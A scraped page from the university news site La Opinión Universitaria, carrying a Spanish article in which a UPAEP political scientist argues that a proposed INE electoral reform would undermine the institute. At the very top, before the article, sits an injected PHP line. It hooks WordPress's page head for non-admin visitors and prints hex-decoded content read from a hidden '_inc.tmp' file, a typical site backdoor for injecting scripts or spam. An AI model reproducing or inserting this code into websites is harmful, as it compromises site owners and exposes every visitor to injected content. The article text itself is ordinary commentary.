if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La reforma al INE, pretende “dinamitar” y demeritar sus funciones: Politóloga – La Opinión Universitaria La Opinión Universitaria
Menu

La reforma al INE, pretende “dinamitar” y demeritar sus funciones: Politóloga

 

La reforma que se plantea hacer al Instituto Nacional Electoral (INE), se proyecta como un elemento en contra del instituto, aunque ésta no sólo abarca a este órgano, sino que comprende varios puntos que se tienen que analizar y que incluye la participación de los ciudadanos.

Las reformas electorales deben de tender a mejorar la calidad de la democracia y para que mejore la calidad de la democracia, no sólo debe haber reglas, sino que estas deben cumplirse, afirmó Claudia Ramón Pérez, catedrática de la Facultad de Ciencia Política y Gobierno de la UPAEP.

Con la supuesta reforma al INE, se “pretende dinamitar sus funciones, demeritar su trabajo, echar abajo su labor”, y esto se verá después de que pasen las elecciones de este 10 de abril con la revocación de mandato, en donde los mexicanos debemos tomar una decisión muy importante y el trabajo está en que esas malas prácticas que se dieron en el pasado y que tanto nos costaron, no regresen.

Y en este momento, las reformas que se están planteando, proponen una disminución de la presencia de las fuerzas minoritarias, pero también esta propuesta de reforma parece un retroceso a las prácticas electorales del pasado, situación que preocupa a los analistas, politólogos y ciudadanos informados, además de considerar dicha reforma como una imposición, en lugar de buscar un diálogo y establecer consensos para que las reglas se definan y se cumplan.

Advirtió que en una democracia debe haber órganos que le hagan contrapesos al poder, en este caso, al poder ejecutivo y uno de los elementos de la división de poderes tiene que ver con estos pesos y contrapesos, “y no dejarse llevar por lo que dicen algunas partes”.

Además, para que se lleve a cabo una reforma, es necesario que sea el resultado de una discusión amplia e incluyente y que vaya en sintonía con los valores de la democracia, pero, si se plantea solamente como una imposición y no contribuye a estos elementos, y más cuando se tiene un precedente y análisis de las reformas electorales en nuestro país.

Dijo que las reformas electorales se han llevado adelante de la mano de los partidos políticos. “Era todo un entramado de ingeniería constitucional que permitía la participación de las fuerzas opositoras en aquel momento, cuando el PRI estaba en el poder. Pero que se fueron abriendo los espacios para que se diera en primer lugar la liberación y en segundo lugar, la transición democrática, que nos llevó a la alternancia en la presidencia de la república”.

 

Tweets recientes